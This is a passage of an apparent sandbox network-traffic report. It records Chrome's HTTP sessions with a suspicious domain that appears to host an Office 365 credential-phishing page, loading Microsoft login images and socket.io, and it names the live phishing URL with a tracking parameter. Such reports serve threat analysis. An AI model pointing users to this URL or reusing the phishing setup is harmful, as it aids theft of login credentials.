                                                                              Data Ascii: t\x20a\x20robot</span>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20...\x20<input\x20class=\x22recaptchacheckbox\x22\x20type=\x22checkbox\x22\x20name=\x22\x22\x20id=\x22\x22>\x20-->\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              9192.168.2.449757192.185.209.04435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:48:47 UTC679OUTGET /favicon.ico HTTP/1.1
                                                                              Host: rieg.riegriegrieg.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: image
                                                                              Referer: https://rieg.riegriegrieg.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZFMW5halE9JnVpZD1VU0VSMDkxMDIwMjRVNDQxMDA5MjE=N0123N
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-26 06:48:48 UTC262INHTTP/1.1 404 Not Found
                                                                              Date: Sat, 26 Oct 2024 06:48:48 GMT
                                                                              Server: Apache
                                                                              Upgrade: h2,h2c
                                                                              Connection: Upgrade, close
                                                                              Last-Modified: Thu, 29 Sep 2022 21:53:01 GMT
                                                                              Accept-Ranges: bytes
                                                                              Content-Length: 2361
                                                                              Vary: Accept-Encoding
                                                                              Content-Type: text/html
                                                                              2024-10-26 06:48:48 UTC2361INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c
                                                                              Data Ascii: <!DOCTYPE html><html lang="pt-BR"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="format-detection" content="tel


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              10192.168.2.44975113.107.246.454435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:48:47 UTC658OUTGET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1
                                                                              Host: aadcdn.msauth.net
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: image
                                                                              Referer: https://rieg.riegriegrieg.com/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-26 06:48:48 UTC778INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:48:48 GMT
                                                                              Content-Type: image/svg+xml
                                                                              Content-Length: 673
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=31536000
                                                                              Content-Encoding: gzip
                                                                              Last-Modified: Wed, 24 May 2023 10:11:46 GMT
                                                                              ETag: 0x8DB5C3F47E260FD
                                                                              x-ms-request-id: c9c40271-601e-006d-06aa-26771d000000
                                                                              x-ms-version: 2009-09-19
                                                                              x-ms-lease-status: unlocked
                                                                              x-ms-blob-type: BlockBlob
                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                              Access-Control-Allow-Origin: *
                                                                              x-azure-ref: 20241026T064848Z-16849878b78p49s6zkwt11bbkn000000018g00000000dzv5
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:48:48 UTC673INData Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41
                                                                              Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq*~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1*#vGal9!9A


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              11192.168.2.44975513.107.246.454435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:48:48 UTC657OUTGET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1
                                                                              Host: logincdn.msauth.net
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: image
                                                                              Referer: https://rieg.riegriegrieg.com/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-26 06:48:48 UTC799INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:48:48 GMT
                                                                              Content-Type: image/svg+xml
                                                                              Content-Length: 276
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=31536000
                                                                              Content-Encoding: gzip
                                                                              Last-Modified: Wed, 22 Jan 2020 00:38:00 GMT
                                                                              ETag: 0x8D79ED35591CF44
                                                                              x-ms-request-id: 1b5f1178-f01e-0058-66d4-266cb6000000
                                                                              x-ms-version: 2009-09-19
                                                                              x-ms-lease-status: unlocked
                                                                              x-ms-blob-type: BlockBlob
                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                              Access-Control-Allow-Origin: *
                                                                              x-azure-ref: 20241026T064848Z-16849878b78x6gn56mgecg60qc00000003b000000000qg0r
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache-Info: L1_T2
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:48:48 UTC276INData Raw: 1f 8b 08 00 00 00 00 00 04 00 95 51 3d 6f c3 20 10 fd 2b 88 ae e6 e0 08 d8 b8 b2 3d 74 ca 90 ae 1d ba 45 8a 6b 5b 22 1f aa 91 c9 cf 2f 67 3b 6e 87 2c 15 f0 80 bb 7b ef 9e a0 1a a7 8e dd cf fe 32 d6 bc 0f e1 f6 2a 65 8c 11 e2 0e ae df 9d d4 4a 29 99 2a 38 8b c3 29 f4 35 d7 86 b3 be 1d ba 3e 2c e7 69 68 e3 db f5 5e 73 c5 14 d3 26 4d de 54 61 08 be 6d 8e e3 d8 86 b1 92 cb ad ba 1d 43 cf 4e 35 7f 47 97 21 82 2d dc 04 ce 98 7d 01 39 16 7e 07 a5 c6 8c d0 09 b0 a5 a1 75 c8 33 d4 de 40 69 8c 98 71 4b cc 9c 55 e5 93 b3 af c1 fb 9a bf 18 45 83 cb bf bd 14 f1 b2 02 94 cd fd 53 fa 1e ff ef e3 ac 04 a0 41 01 aa c0 b4 0e 36 95 97 a4 47 9b 05 67 1d 11 d6 2c 66 33 67 c1 35 46 1b b1 49 9d da d8 47 40 3c 0e 98 4c 2e 3a 60 b5 4e 26 01 3f 52 03 93 0c cf 89 64 b4 b0 28 08 37
                                                                              Data Ascii: Q=o +=tEk["/g;n,{2*eJ)*8)5>,ih^s&MTamCN5G!-}9~u3@iqKUESA6Gg,f3g5FIG@<L.:`N&?Rd(7


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              12192.168.2.44975313.107.246.454435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:48:48 UTC659OUTGET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1
                                                                              Host: aadcdn.msauth.net
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: image
                                                                              Referer: https://rieg.riegriegrieg.com/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-26 06:48:48 UTC806INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:48:48 GMT
                                                                              Content-Type: image/svg+xml
                                                                              Content-Length: 1435
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=31536000
                                                                              Content-Encoding: gzip
                                                                              Last-Modified: Wed, 24 May 2023 10:11:48 GMT
                                                                              ETag: 0x8DB5C3F4911527F
                                                                              x-ms-request-id: 00233da3-801e-0004-566c-2771fc000000
                                                                              x-ms-version: 2009-09-19
                                                                              x-ms-lease-status: unlocked
                                                                              x-ms-blob-type: BlockBlob
                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                              Access-Control-Allow-Origin: *
                                                                              x-azure-ref: 20241026T064848Z-16849878b786lft2mu9uftf3y40000000300000000002g82
                                                                              x-fd-int-roxy-purgeid: 4554691
                                                                              X-Cache: TCP_HIT
                                                                              X-Cache-Info: L1_T2
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:48:48 UTC1435INData Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5
                                                                              Data Ascii: WMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              13192.168.2.44975213.107.246.454435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:48:48 UTC679OUTGET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1
                                                                              Host: aadcdn.msauth.net
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: image
                                                                              Referer: https://rieg.riegriegrieg.com/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-26 06:48:48 UTC806INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:48:48 GMT
                                                                              Content-Type: image/svg+xml
                                                                              Content-Length: 2407
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=31536000
                                                                              Content-Encoding: gzip
                                                                              Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                                                              ETag: 0x8DB5C3F499A9B99
                                                                              x-ms-request-id: 0c44100f-301e-0012-4cff-26b886000000
                                                                              x-ms-version: 2009-09-19
                                                                              x-ms-lease-status: unlocked
                                                                              x-ms-blob-type: BlockBlob
                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                              Access-Control-Allow-Origin: *
                                                                              x-azure-ref: 20241026T064848Z-17c5cb586f6wnfhvhw6gvetfh40000000130000000005hgh
                                                                              x-fd-int-roxy-purgeid: 4554691
                                                                              X-Cache: TCP_HIT
                                                                              X-Cache-Info: L1_T2
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:48:48 UTC2407INData Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 59 3d 73 dd 38 12 cc af ea fe 03 eb 6d 72 17 88 02 66 f0 79 b5 ba e0 98 38 a0 52 05 ca ec 95 6c ab 4e 6b bb 6c af b5 3f ff ba 07 e0 7b 24 94 6c 7c 65 27 7a 4d 02 33 c3 c1 a0 a7 01 ff fa ed c7 87 e9 e5 e9 e1 fb c7 9b 53 28 a7 e9 e3 e3 d3 87 8f df db ef 1f 4f 8f 2f ff f9 fc e7 cd c9 4d 6e 0a 65 e2 b3 f7 4f cf cf 37 a7 4f 9f 3f 3d 9e a6 3f 7f 7f fe f4 ed e6 f4 f1 fb f7 2f ff ba be 7e 79 79 99 5f 74 fe fc f5 c3 b5 38 e7 ae 61 f8 f4 ef bf ff ed d7 df df 7e fb ef f4 f4 00 2b f9 9d 24 a7 e1 2a a6 b7 7a 15 ea 83 5c 95 f7 92 ae 7e cb ef 4a 78 7c 17 1e 1f 1f c2 e6 e0 97 f7 f6 cf 0c 7c 79 fb fd a3 3d be fa fa c7 f3 e3 cd e9 f1 c7 e3 a7 cf 0f 0f a7 e9 b7 e7 a7 2f e3 33 f8 b9 15 9d 6b 4e 32 b9 c5 a7 b9 48 08 08 df 3b 3c 73 79 8a b3 04
                                                                              Data Ascii: Y=s8mrfy8RlNkl?{$l|e'zM3S(O/MneO7O?=?/~yy_t8a~+$*z\~Jx||y=/3kN2H;<sy


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              14192.168.2.44975613.107.246.454435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:48:48 UTC662OUTGET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1
                                                                              Host: aadcdn.msauth.net
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: image
                                                                              Referer: https://rieg.riegriegrieg.com/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-26 06:48:48 UTC805INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:48:48 GMT
                                                                              Content-Type: image/svg+xml
                                                                              Content-Length: 199
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=31536000
                                                                              Content-Encoding: gzip
                                                                              Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                                                              ETag: 0x8DB5C3F49C21D98
                                                                              x-ms-request-id: cef8a491-c01e-0006-2ce1-26f0e9000000
                                                                              x-ms-version: 2009-09-19
                                                                              x-ms-lease-status: unlocked
                                                                              x-ms-blob-type: BlockBlob
                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                              Access-Control-Allow-Origin: *
                                                                              x-azure-ref: 20241026T064848Z-17c5cb586f65j4snyp1hqk5z2s00000003400000000014m7
                                                                              x-fd-int-roxy-purgeid: 4554691
                                                                              X-Cache: TCP_HIT
                                                                              X-Cache-Info: L1_T2
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:48:48 UTC199INData Raw: 1f 8b 08 00 00 00 00 00 04 00 75 8f bd ae c2 30 0c 85 5f 25 32 6b d5 38 3f 88 80 92 0e 77 ea 00 6b 87 bb 21 08 4d a4 d2 22 62 35 3c fe 4d 2e 62 44 b6 e4 63 fb d3 b1 6c d3 3a b2 d7 7d 9a 93 83 40 f4 38 70 9e 73 6e b3 6a 97 e7 c8 25 22 f2 42 00 cb f1 4a c1 81 36 c0 82 8f 63 a0 b7 5e a3 cf 3f cb cb 01 32 64 da 94 84 ce 52 a4 c9 77 e7 94 3c 25 cb df 9d 7d fa 0b 7d 73 b9 c5 69 72 30 2f b3 07 de d9 c7 99 02 bb 3a 38 29 d3 28 1c 84 ec 05 0e 0a 83 5e 75 bb dd 99 a3 30 b5 94 55 af cc 49 c8 46 c9 de 0c 02 7b 5d a8 c2 ee 5b 2d e5 b1 ce ff d5 ef c7 7e a3 b1 46 bd 50 5f ea fe 00 a3 0d 47 ef fa 00 00 00
                                                                              Data Ascii: u0_%2k8?wk!M"b5<M.bDcl:}@8psnj%"BJ6c^?2dRw<%}}sir0/:8)(^u0UIF{][-~FP_G


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              15192.168.2.44974918.245.31.894435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:48:48 UTC359OUTGET /4.7.5/socket.io.min.js HTTP/1.1
                                                                              Host: cdn.socket.io
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-26 06:48:48 UTC702INHTTP/1.1 200 OK
                                                                              Content-Type: application/javascript; charset=utf-8
                                                                              Content-Length: 49993
                                                                              Connection: close
                                                                              Accept-Ranges: bytes
                                                                              Access-Control-Allow-Origin: *
                                                                              Cache-Control: public, max-age=31536000, immutable
                                                                              Content-Disposition: inline; filename="socket.io.min.js"
                                                                              Date: Sat, 03 Aug 2024 07:26:50 GMT
                                                                              ETag: "777eb8fd4f8320b6e5cc9a7159bdec6a"
                                                                              Server: Vercel
                                                                              Strict-Transport-Security: max-age=63072000
                                                                              X-Vercel-Cache: HIT
                                                                              X-Vercel-Id: fra1::4xmtd-1722670010047-e30d468233ba
                                                                              X-Cache: Hit from cloudfront
                                                                              Via: 1.1 e030504e72fa75d92c1856a58b964932.cloudfront.net (CloudFront)
                                                                              X-Amz-Cf-Pop: FRA56-P8
                                                                              X-Amz-Cf-Id: IbR3_2i3kAVewsrfiOp7gVfEgEqllX6BP7fjULZ_4k0n2dkdXSfvfQ==
                                                                              Age: 7632719
                                                                              2024-10-26 06:48:48 UTC15682INData Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 37 2e 35 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 34 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 74 29 3a 28 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67
                                                                              Data Ascii: /*! * Socket.IO v4.7.5 * (c) 2014-2024 Guillermo Rauch * Released under the MIT License. */!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof g
                                                                              2024-10-26 06:48:48 UTC16384INData Raw: 64 20 74 68 69 73 2e 73 65 74 54 69 6d 65 6f 75 74 46 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 6f 6e 45 72 72 6f 72 28 65 29 7d 29 2c 30 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 26 26 28 74 68 69 73 2e 69 6e 64 65 78 3d 69 2e 72 65 71 75 65 73 74 73 43 6f 75 6e 74 2b 2b 2c 69 2e 72 65 71 75 65 73 74 73 5b 74 68 69 73 2e 69 6e 64 65 78 5d 3d 74 68 69 73 29 7d 7d 2c 7b 6b 65 79 3a 22 6f 6e 45 72 72 6f 72 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 65 72 72 6f 72 22 2c 65 2c 74 68 69 73 2e 78 68 72 29 2c 74 68 69 73 2e 63 6c 65 61 6e 75 70 28 21 30 29 7d 7d 2c 7b 6b 65 79 3a 22 63 6c 65 61 6e 75 70 22 2c 76 61 6c 75 65 3a 66 75 6e
                                                                              Data Ascii: d this.setTimeoutFn((function(){t.onError(e)}),0)}"undefined"!=typeof document&&(this.index=i.requestsCount++,i.requests[this.index]=this)}},{key:"onError",value:function(e){this.emitReserved("error",e,this.xhr),this.cleanup(!0)}},{key:"cleanup",value:fun
                                                                              2024-10-26 06:48:48 UTC16384INData Raw: 65 2e 64 61 74 61 2c 69 64 3a 65 2e 69 64 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 65 6e 63 6f 64 65 41 73 53 74 72 69 6e 67 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 22 2b 65 2e 74 79 70 65 3b 72 65 74 75 72 6e 20 65 2e 74 79 70 65 21 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 45 56 45 4e 54 26 26 65 2e 74 79 70 65 21 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 41 43 4b 7c 7c 28 74 2b 3d 65 2e 61 74 74 61 63 68 6d 65 6e 74 73 2b 22 2d 22 29 2c 65 2e 6e 73 70 26 26 22 2f 22 21 3d 3d 65 2e 6e 73 70 26 26 28 74 2b 3d 65 2e 6e 73 70 2b 22 2c 22 29 2c 6e 75 6c 6c 21 3d 65 2e 69 64 26 26 28 74 2b 3d 65 2e 69 64 29 2c 6e 75 6c 6c 21 3d 65 2e 64 61 74 61 26 26 28 74 2b 3d 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 2e 64 61 74 61 2c 74 68 69
                                                                              Data Ascii: e.data,id:e.id})}},{key:"encodeAsString",value:function(e){var t=""+e.type;return e.type!==Be.BINARY_EVENT&&e.type!==Be.BINARY_ACK||(t+=e.attachments+"-"),e.nsp&&"/"!==e.nsp&&(t+=e.nsp+","),null!=e.id&&(t+=e.id),null!=e.data&&(t+=JSON.stringify(e.data,thi
                                                                              2024-10-26 06:48:48 UTC1543INData Raw: 65 74 54 69 6d 65 6f 75 74 46 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 73 6b 69 70 52 65 63 6f 6e 6e 65 63 74 7c 7c 28 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 72 65 63 6f 6e 6e 65 63 74 5f 61 74 74 65 6d 70 74 22 2c 74 2e 62 61 63 6b 6f 66 66 2e 61 74 74 65 6d 70 74 73 29 2c 74 2e 73 6b 69 70 52 65 63 6f 6e 6e 65 63 74 7c 7c 74 2e 6f 70 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6e 3f 28 74 2e 5f 72 65 63 6f 6e 6e 65 63 74 69 6e 67 3d 21 31 2c 74 2e 72 65 63 6f 6e 6e 65 63 74 28 29 2c 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 72 65 63 6f 6e 6e 65 63 74 5f 65 72 72 6f 72 22 2c 6e 29 29 3a 74 2e 6f 6e 72 65 63 6f 6e 6e 65 63 74 28 29 7d 29 29 29 7d 29 2c 6e 29 3b 74 68 69 73 2e 6f 70 74 73 2e 61 75 74 6f 55 6e 72 65 66 26 26 72 2e
